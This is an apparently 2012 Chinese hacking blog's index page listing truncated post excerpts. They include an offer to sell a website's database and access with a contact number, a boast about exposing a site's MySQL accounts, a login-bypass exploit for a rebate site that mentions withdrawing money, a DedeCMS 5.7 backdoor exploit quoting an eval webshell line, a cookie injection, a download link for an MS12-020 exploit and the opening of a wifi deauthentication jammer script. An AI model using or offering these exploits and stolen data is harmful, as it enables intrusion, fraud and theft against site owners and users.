-
做好本站的链接后,在此页面留言,审核通过后,即做好链接。
.TK 和非顶级域名,不在考虑范围内,谢谢谅解!
链接格式:
站名:少龙's blog网址:http://slhack.blogbus.com
欢迎大家链接。 -
2012-05-15
出售www.8zy.com 数据 权限 程序 - [脚本攻防]
出售www.8zy.com 数据 权限 程序 有意者加我小号 568314123
-
由于当天下午木事干,发现哈客一猪肉。。
开搞。。
root admin等等 mysql账户全部曝光
使用mysql 直接使用hash登录的神器登录之前,通知了却步。。却步补之。。再测试。失败
无恶意。。娱乐而已 ,数据库我连看都没看。。。
-
2012-05-15
MS12-032的POC - [脚本攻防]
微软发布了ms12-032的补丁:
http://technet.microsoft.com/en-us/security/bulletin/ms12-032
这个补丁是与TCP/IP协议有关的一个栈溢出问题,可以导致本地提权,目前微软已经要求StackOverflow.com移除这些代码。
老外是这么说的,尝试绑定一个IPV6-mapped IPV4 ... -
2012-03-31
多多返利程序,任意用户登录,甚至可以提现 - [脚本攻防]
简要描述:多多返利程序,任意用户登录,甚至可以提现!
详细说明:http://127.0.0.1/uc.php
在后台未开启ucenter时候,存在典型的UC_key未初始化漏洞
由于UCkey未初始化导致访问者可以随意调用uc接口的各种函数
其中包括自动登陆 修改密码
漏洞证明:poc:
<?php... -
2012-03-24
dedecms 5.7 一句话后门利用 - [脚本攻防]
详细说明:前段时间乌云爆料DEDE5.7爆出shopcar.class.php包含一句话木马,@eval(file_get_contents('php://input'));。详情可查看乌云http://www.wooyun.org/bug.php?action=view&id=5416。此EXP可激活此版本中的一句话后门。
class MemberShops
{
var $OrdersI... -
2012-03-24
PHPweb建站系统cookies注入漏洞 - [脚本攻防]
PHPweb建站系统cookies注入漏洞漏洞页面member/post.php
view sourceprint?01
02 define("ROOTPATH", "../");
03 include(ROOTPATH."includes/common.inc.php");
04 include("language/".$sLan.".php");
05 include(ROOTP... -
2012-03-19
MS12020 xx自动版 - [脚本攻防]
http://down.qiannao.com/space/file/qiannao/share/2012/3/19/MS12020-0020xx-81ea-52a8-7248.rar/.page
啥都不解释 -
2012-03-19
一个干扰wifi的shell脚本 - [脚本攻防]
wifijammer 0.1
忘了啥时候在哪捡的了
#!/bin/bash
# This is a bash based wifi jammer. It uses your wifi card
# to continuously send de-authenticate packets to every client
# on a specified channel... at lest thats what its suppose to do.
# This prog...